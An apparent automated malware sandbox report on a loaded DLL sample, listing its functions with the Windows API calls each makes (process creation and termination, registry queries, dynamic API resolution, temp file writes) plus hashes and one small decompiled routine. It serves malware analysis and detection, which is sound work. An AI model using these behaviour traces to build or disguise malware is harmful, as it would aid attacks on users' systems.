                • Opcode Fuzzy Hash: 44cacba63d725a3010eb0ba44e1d783d9372a5bf7655e174d82e4a50ef124a27
                • Instruction Fuzzy Hash: 9E315A71804306EFD710AF65C884C6BBBE9FF98258B04092EF48697220F735ED158BA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D74AD Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D74EA
                • HeapFree.KERNEL32(00000000,046ED06E,?,?,046C906C,?,046ED06E,?,?,?,?), ref: 046D7520
                • GetComputerNameW.KERNEL32(00000000,?), ref: 046D752E
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046D7545
                • GetComputerNameW.KERNEL32(00000000,?), ref: 046D7556
                • HeapFree.KERNEL32(00000000,00000000,?,?,046C906C,?,046ED06E,?,?,?,?), ref: 046D757C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateComputerFreeName
                • String ID:
                • API String ID: 3439771632-0
                • Opcode ID: 65b2c36d720876d59ec14109413add4faad6caf5f0288c2dd2ecb805bb401f1c
                • Instruction ID: 007f4e659ce085c71f52cab8d48958882ebe3e818b8503c2ee3cb15f3b6ab5eb
                • Opcode Fuzzy Hash: 65b2c36d720876d59ec14109413add4faad6caf5f0288c2dd2ecb805bb401f1c
                • Instruction Fuzzy Hash: 7C31EAB6E00209EFDB10EFA6DD848AEBBF9FB44204B109469E405D7600EB34EE559F61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C3DA2 Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?), ref: 046C3DBE
                • lstrlen.KERNEL32(?), ref: 046C3DD4
                • lstrlen.KERNEL32(?), ref: 046C3DE9
                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 046C3E4E
                • _snprintf.NTDLL ref: 046C3E74
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 046C3E93
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlen$Heap$AllocateFree_snprintf
                • String ID:
                • API String ID: 3180502281-0
                • Opcode ID: b0ac16e479d19dca17b78e08de813b20dbb355f7ce8c0432ffc4841bfd4cebcd
                • Instruction ID: 25352dcd67ea8c6c7729ff92984f6ad10a2f501b732fcf05df8bc67e32511a4d
                • Opcode Fuzzy Hash: b0ac16e479d19dca17b78e08de813b20dbb355f7ce8c0432ffc4841bfd4cebcd
                • Instruction Fuzzy Hash: F5316172910259FFDB11EF66DC448AB7BAAFB44344B01942AFC05AB200F732AD50DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D5FA2 Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                Download Yara Rule
                APIs
                • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 046D5FBC
                • CreateWaitableTimerA.KERNEL32(046EE268,00000003,?), ref: 046D5FD9
                • GetLastError.KERNEL32(?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046D5FEA
                  • Part of subcall function 046CBC31: RegQueryValueExA.KERNELBASE(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,00000003,00000000,?,00000000,?,046DE5BD,046DE5BD,?,046D6019,00000000), ref: 046CBC69
                  • Part of subcall function 046CBC31: RtlAllocateHeap.NTDLL(00000000,046D6019), ref: 046CBC7D
                  • Part of subcall function 046CBC31: RegQueryValueExA.ADVAPI32(?,046DE5BD,00000000,046DE5BD,00000000,046D6019,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046CBC97
                  • Part of subcall function 046CBC31: RegCloseKey.ADVAPI32(?,?,046D6019,00000000,046DE5BD,?,?,?,046DE5BD,?,?,?,00000000,?,?,?), ref: 046CBCC1
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D602A
                • SetWaitableTimer.KERNEL32(00000000,046DE5BD,00000000,00000000,00000000,00000000,?,?,046DE5BD,?), ref: 046D6049
                • HeapFree.KERNEL32(00000000,046DE5BD,00000000,046DE5BD,?,?,?,046DE5BD,?), ref: 046D605F
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                • String ID:
                • API String ID: 1835239314-0
                • Opcode ID: 3eff8ce2dadfa5a0f48f26e67d832aa2a8be3d935e85d79b0af435b18ca33f3b
                • Instruction ID: 9cf6a0fb10b65fa1555db7bdddfb3b3dcc6f1c060647554adeadcc60ca2ca8a6
                • Opcode Fuzzy Hash: 3eff8ce2dadfa5a0f48f26e67d832aa2a8be3d935e85d79b0af435b18ca33f3b
                • Instruction Fuzzy Hash: FC312F71D00209EBCF20DF96C989CAFBBB9EB94755B148015F505A7200F734AE40CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D4E85 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                Download Yara Rule
                APIs
                • StrChrA.SHLWAPI(00000000,00000020,00000000,?,00000000,?,?,?,046D9A91,00000000,?,046EE17C,?,?,046EE218), ref: 046D4E9D
                • StrChrA.SHLWAPI(00000001,00000020,?,?,?,046D9A91,00000000,?,046EE17C,?,?,046EE218), ref: 046D4EAE
                  • Part of subcall function 046CAAD8: lstrlen.KERNEL32(046D79F2,?,00000000,00000000,?,046D79F2,00000000,?,00000001,00000000,00000001), ref: 046CAAEA
                  • Part of subcall function 046CAAD8: StrChrA.SHLWAPI(00000001,0000000D,?,046D79F2,00000000,?,00000001,00000000,00000001), ref: 046CAB22
                • RtlAllocateHeap.NTDLL(00000000,01000000,00000000), ref: 046D4EEE
                • memcpy.NTDLL(00000000,?,00000007,?,?,?,046D9A91,00000000,?,046EE17C,?), ref: 046D4F1B
                • memcpy.NTDLL(00000000,046EE218,046EE218,00000000,?,00000007,?,?,?,046D9A91,00000000,?,046EE17C,?), ref: 046D4F2A
                • memcpy.NTDLL(046EE218,?,?,00000000,046EE218,046EE218,00000000,?,00000007,?,?,?,046D9A91,00000000,?,046EE17C), ref: 046D4F3C
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: memcpy$AllocateHeaplstrlen
                • String ID:
                • API String ID: 1819133394-0
                • Opcode ID: 83bc782b211a7126300d42286a853eb2aeaa461c988b53bef4330afc9adb7f8b
                • Instruction ID: b82671ca4974ee7c77c64af5236e2dda757c45090b9f5f209fe7da3847d3dc6f
                • Opcode Fuzzy Hash: 83bc782b211a7126300d42286a853eb2aeaa461c988b53bef4330afc9adb7f8b
                • Instruction Fuzzy Hash: AF213972A0020ABFDB10DF95CC84F9ABBE8EF58654F054056E908DB251FA71EE448BA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C9470 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                Download Yara Rule
                APIs
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?), ref: 046C94AF
                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 046C94C0
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000,?,?,?,?), ref: 046C94DB
                • GetLastError.KERNEL32(?,?,?,?), ref: 046C94F1
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046C9503
                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 046C9518
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                • String ID:
                • API String ID: 1822509305-0
                • Opcode ID: 6ec4a36f8d1b980471bae4010724f3041efc264e8adf0baad19e6a8a9e85fbc7
                • Instruction ID: 33912e8a037cad62c2b500fbeadfe84701564f814d3d1c264f4c3cdea77d71b2
                • Opcode Fuzzy Hash: 6ec4a36f8d1b980471bae4010724f3041efc264e8adf0baad19e6a8a9e85fbc7
                • Instruction Fuzzy Hash: 80117C76901128FBDF226B96DC48CEF7FBEEF45390B004021F504A6110E6369E65EBB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D1FAE Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON
                Download Yara Rule
                APIs
                • OpenProcess.KERNEL32(00000E39,00000000,?), ref: 046D1FD6
                • _strupr.NTDLL ref: 046D2011
                • lstrlen.KERNEL32(00000000), ref: 046D2019
                • TerminateProcess.KERNEL32(00000000,00000000), ref: 046D2058
                • CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 046D205F
                • GetLastError.KERNEL32 ref: 046D2067
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
                • String ID:
                • API String ID: 110452925-0
                • Opcode ID: 2361693c24650568eb4f137d325a9fb306316afb35586ad649fdbc4eda31631a
                • Instruction ID: 192546af4e161ec66c619da57f892b62e5b110a1d69199d3f78f45b0cdfa3d09
                • Opcode Fuzzy Hash: 2361693c24650568eb4f137d325a9fb306316afb35586ad649fdbc4eda31631a
                • Instruction Fuzzy Hash: 3611C4B1900204EFDB217B719C9CD7E37ADEB98714B001455FA02DB140FA79A841CB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C557E Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON
                Download Yara Rule
                APIs
                • RegOpenKeyA.ADVAPI32(80000001,?,74E5F710), ref: 046C559C
                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000), ref: 046C55CA
                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 046C55DC
                • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 046C5601
                • HeapFree.KERNEL32(00000000,00000000), ref: 046C561C
                • RegCloseKey.ADVAPI32(?), ref: 046C5626
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: HeapQueryValue$AllocateCloseFreeOpen
                • String ID:
                • API String ID: 170146033-0
                • Opcode ID: e796e6dcfd18b370188e2eb6d9f971624cf5ac507c2c076d606756bd7125570d
                • Instruction ID: c2f11574ab21db65f9a868b1dc9e23a765497f7a1cc307f5052e2425f609ebe2
                • Opcode Fuzzy Hash: e796e6dcfd18b370188e2eb6d9f971624cf5ac507c2c076d606756bd7125570d
                • Instruction Fuzzy Hash: 0C1108B6900119FFDB11DB96DD88CAEBBFDEB48644B001069E901A6121F7366E55DF20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DFCD1 Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(00000000,74E5F730,-00000001,00000000,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE2
                • lstrlen.KERNEL32(?,?,?,?,046CD8A7,?,00000000,000000FF), ref: 046DFCE9
                • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 046DFCFB
                • _snprintf.NTDLL ref: 046DFD21
                  • Part of subcall function 046E2BDD: memset.NTDLL ref: 046E2BF2
                  • Part of subcall function 046E2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 046E2C2B
                  • Part of subcall function 046E2BDD: wcstombs.NTDLL ref: 046E2C35
                  • Part of subcall function 046E2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 046E2C66
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2C92
                  • Part of subcall function 046E2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 046E2CA8
                  • Part of subcall function 046E2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,046DFD2F), ref: 046E2CBC
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CEF
                  • Part of subcall function 046E2BDD: CloseHandle.KERNEL32(?), ref: 046E2CF4
                • _snprintf.NTDLL ref: 046DFD55
                  • Part of subcall function 046E2BDD: GetLastError.KERNEL32 ref: 046E2CC0
                  • Part of subcall function 046E2BDD: GetExitCodeProcess.KERNEL32(?,00000001), ref: 046E2CE0
                • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 046DFD72
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
                • String ID:
                • API String ID: 1481739438-0
                • Opcode ID: cb972f4f72e595c688dbebf23936f0a5c1c658e70bae13cdf32796e9f835f327
                • Instruction ID: 00eada35d6832c3a936589085375c7db8181905e6ffa1f5ca95ed6d763affab7
                • Opcode Fuzzy Hash: cb972f4f72e595c688dbebf23936f0a5c1c658e70bae13cdf32796e9f835f327
                • Instruction Fuzzy Hash: 2711D076A00219BFCB11AF66DC44D9E3FADEB04364B108056FD0A9B211E735EE50DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D8F73 Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,046C895C), ref: 046D8F93
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FB2
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FC7
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FDD
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D8FF3
                • GetProcAddress.KERNEL32(00000000,?), ref: 046D9009
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: AddressProc$AllocateHeapLibraryLoad
                • String ID:
                • API String ID: 2486251641-0
                • Opcode ID: abc534235232c73b045284d4445de35927139f22aa596cc7e65587f8f1583007
                • Instruction ID: 84b70302c1dce59f04ef41e1e43f672cef7adb3b023695ab94c3c84503621795
                • Opcode Fuzzy Hash: abc534235232c73b045284d4445de35927139f22aa596cc7e65587f8f1583007
                • Instruction Fuzzy Hash: 3C113DB2A0120B9F9720EF79EC88D6233ECEB09744305556AE549DB212F736F8059F60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D6FFE Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON
                Download Yara Rule
                APIs
                • lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D7014
                • RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 046D7027
                • lstrcpy.KERNEL32(00000008,?), ref: 046D7049
                • GetLastError.KERNEL32(046C209B,00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D7072
                • HeapFree.KERNEL32(00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D708A
                • CloseHandle.KERNEL32(00000000,046C209B,00000000,00000000,?,?,046D156F,046DAF39,00000057,00000000), ref: 046D7093
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
                • String ID:
                • API String ID: 2860611006-0
                • Opcode ID: f57a35f8d5df6f38ae1a9fb5492e23d67c56f0f3240dad9c5e539cbdfb6e8e68
                • Instruction ID: 43858ee57169a2e627a75fcf3857719d12ffd8dee6d0809390cb102861a3af83
                • Opcode Fuzzy Hash: f57a35f8d5df6f38ae1a9fb5492e23d67c56f0f3240dad9c5e539cbdfb6e8e68
                • Instruction Fuzzy Hash: D6119675500205EFDB10AFA6DC848AFBBE8FB54361700442AF815C7280F735AD55DB70
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046D0D54 Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON
                Download Yara Rule
                APIs
                • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,74E05520,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D66
                  • Part of subcall function 046C8F9E: RtlAllocateHeap.NTDLL(00000000,?,046C2180), ref: 046C8FAA
                • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D7F
                • GetCurrentThreadId.KERNEL32 ref: 046D0D8C
                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0D98
                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,046C9A74,00000000,?,00000000,00000000,?), ref: 046D0DA6
                • lstrcpy.KERNEL32(00000000), ref: 046D0DC8
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                • String ID:
                • API String ID: 1175089793-0
                • Opcode ID: 673d8310c1a1672861388f0e17d157459d410f51b6d1b9206dc2dabe2bff3f83
                • Instruction ID: 7646ffeafb74310a6daabdb1d8094a54febc6d96f07ebebc99154c1f36c4156f
                • Opcode Fuzzy Hash: 673d8310c1a1672861388f0e17d157459d410f51b6d1b9206dc2dabe2bff3f83
                • Instruction Fuzzy Hash: DA014832900215AB97116B669C48D6F7BECDFD5755B190017F905E7201FA74FC058BB0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CEA37 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: ErrorLastmemset
                • String ID: vids
                • API String ID: 3276359510-3767230166
                • Opcode ID: 5ba3975c7c7e44dd69bf214a3c121db6786798eac9b424cea2fdcf086da11f51
                • Instruction ID: 22cda851f9b1808260c5d4bad7edefd737665df79f8bff49827979abf17838b9
                • Opcode Fuzzy Hash: 5ba3975c7c7e44dd69bf214a3c121db6786798eac9b424cea2fdcf086da11f51
                • Instruction Fuzzy Hash: 9281F7B1D012299FDF20DFA4D9849ADBBB9FF48710F10816AF415EB250E735AA41CFA4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046DE3F3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119memorystringCOMMON
                Download Yara Rule
                APIs
                • RtlAllocateHeap.NTDLL(00000000,?), ref: 046DE47D
                • lstrlen.KERNEL32(?), ref: 046DE4AE
                • memcpy.NTDLL(00000008,?,00000001), ref: 046DE4BD
                • HeapFree.KERNEL32(00000000,00000000), ref: 046DE53C
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: Heap$AllocateFreelstrlenmemcpy
                • String ID: W
                • API String ID: 379260646-655174618
                • Opcode ID: d161554e3409ea3d83d0ab06722990269c161c85d553b66ebefdfc021ff25dd1
                • Instruction ID: b5b3b7e0f9b8a184a1db7099edecf00d84a3c4b31e661dfcdaf42f0c280e14bb
                • Opcode Fuzzy Hash: d161554e3409ea3d83d0ab06722990269c161c85d553b66ebefdfc021ff25dd1
                • Instruction Fuzzy Hash: D341B230A00B09DBDB248F19D8847E677E6EB29344F08942EE4498F350F377B996CB56
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046CD689 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                Download Yara Rule
                APIs
                • memset.NTDLL ref: 046CD734
                • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 046CD79B
                • GetLastError.KERNEL32(?,00000000,00000000), ref: 046CD7A5
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: BuffersErrorFileFlushLastmemset
                • String ID: K$P
                • API String ID: 3817869962-420285281
                • Opcode ID: cbd3e211658ab09f0f6975b5e022b51935740676f92d1041033a888f7d1500b3
                • Instruction ID: 2fbdf7c57ca2bdd6d35fde5edd4c86ab52682e502cdeb8bd52a9eb1334082c16
                • Opcode Fuzzy Hash: cbd3e211658ab09f0f6975b5e022b51935740676f92d1041033a888f7d1500b3
                • Instruction Fuzzy Hash: 61416C70A006059FDB24DFA8C9846BBBBF1FF64B04F54483DD59693680E334B904CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046E2EF9 Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON
                Download Yara Rule
                APIs
                • memcpy.NTDLL(?,046D3804,00000000,?,?,?,046D3804,?,?,?,?,?), ref: 046E2F37
                • lstrlen.KERNEL32(046D3804,?,?,?,046D3804,?,?,?,?,?), ref: 046E2F55
                • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 046E2FC4
                • lstrlen.KERNEL32(046D3804,00000000,00000000,?,?,?,046D3804,?,?,?,?,?), ref: 046E2FE5
                • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 046E2FF9
                • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 046E3002
                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 046E3010
                Memory Dump Source
                • Source File: 00000001.00000002.517566109.00000000046C0000.00000040.10000000.00040000.00000000.sdmp, Offset: 046C0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_46c0000_loaddll32.jbxd
                Similarity
                • API ID: lstrlenmemcpy$FreeLocal
                • String ID:
                • API String ID: 1123625124-0
                • Opcode ID: 089b4f711cb403cc2241636c5ff2e37c439f0f012be849e48a36254ecb85b9dc
                • Instruction ID: 08f72e2c3aa8d37e882ee1b1ae18f640eb3508732ce6ebbc5eda058de19f05b4
                • Opcode Fuzzy Hash: 089b4f711cb403cc2241636c5ff2e37c439f0f012be849e48a36254ecb85b9dc
                • Instruction Fuzzy Hash: EB41E5B290121AAFDF11DF66DD458EE3BA9EF14364B044069FD04A7210F732EE649BE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 01C13F8C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28sleepmemoryCOMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E01C13F8C() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x1c1a384; // 0x21795b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x1c1a384; // 0x21795b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x1c1a384; // 0x21795b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x1c1b823) {
					HeapFree( *0x1c1a290, 0, _t10);
					_t7 =  *0x1c1a384; // 0x21795b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                0x01c13f8c
                0x01c13f95
                0x01c13fa5
                0x01c13fa5
                0x01c13faa
                0x01c13faf
                0x00000000
                0x00000000
                0x01c13f9f
                0x01c13f9f
                0x01c13fb1
                0x01c13fb6
                0x01c13fba
                0x01c13fcd
                0x01c13fd3
                0x01c13fd3
                0x01c13fdc
                0x01c13fde
                0x01c13fe2
                0x01c13fe8

                APIs
                • RtlEnterCriticalSection.NTDLL(02179570), ref: 01C13F95
                • Sleep.KERNEL32(0000000A), ref: 01C13F9F
                • HeapFree.KERNEL32(00000000), ref: 01C13FCD
                • RtlLeaveCriticalSection.NTDLL(02179570), ref: 01C13FE2
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.511641891.0000000001C11000.00000020.10000000.00040000.00000000.sdmp, Offset: 01C10000, based on PE: true
                • Associated: 00000001.00000002.511610841.0000000001C10000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511683675.0000000001C19000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511708991.0000000001C1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000001.00000002.511752538.0000000001C1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_1c10000_loaddll32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID: Ut
                • API String ID: 58946197-8415677
                • Opcode ID: 9004d40878f8ac4f5d0852e72b9e4139198a8c1e5c78cf8ac6fe9ae2bf19c0a9
                • Instruction ID: 0d9c25e787342e605392ad397a09bf4326c8b60c4a56ca382e908caf72c096c2
                • Opcode Fuzzy Hash: 9004d40878f8ac4f5d0852e72b9e4139198a8c1e5c78cf8ac6fe9ae2bf19c0a9
                • Instruction Fuzzy Hash: EFF0D4742C1280DFE7298B28D99DB293BB5BB2BB19B04014CF94B87799D774E810DB15
                Uniqueness

                Uniqueness Score: -1.00%

                Function 046C5B1B Relevance: 7.7, APIs: 6, Instructions: 171stringCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4BB
                  • Part of subcall function 046CD4AA: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,046C1FAD,?), ref: 046CD4D8
                • lstrlenW.KERNEL32(?,00000000,?,80000001,?,74B606E0,046C4823,?,?,00000000,?), ref: 046C5B67
                • lstrlenW.KERNEL32(00000008,?,80000001,?,74B606E0,046C4823,?,?,00000000,?), ref: 046C5B6E
                • lstrlenW.KERNEL32(?,?,?,80000001,?,74B606E0,046C4823,?,?,00000000,?), ref: 046C5B8C
                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 046C5C4A
                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 046C5C55
                • wsprintfA.USER32 ref: 046C5C97
                  • Part of subcall function 046C57E0: RtlFreeHeap.NTDLL(00000000,?,046C222D,?,?,?,?,?,?,?,?,046C1089,?,?,?), ref: 046C57EC
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,046E4FFC), ref: 046E373F
                  • Part of subcall function 046E36FE: GetLastError.KERNEL32 ref: 046E3749
                  • Part of subcall function 046E36FE: WaitForSingleObject.KERNEL32(000000C8), ref: 046E376E
                  • Part of subcall function 046E36FE: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 046E378F
                  • Part of subcall function 046E36FE: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 046E37B7
                  • Part of subcall function 046E36FE: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 046E37CC
                  • Part of subcall function 046E36FE: SetEndOfFile.KERNEL32(00000006), ref: 046E37D9
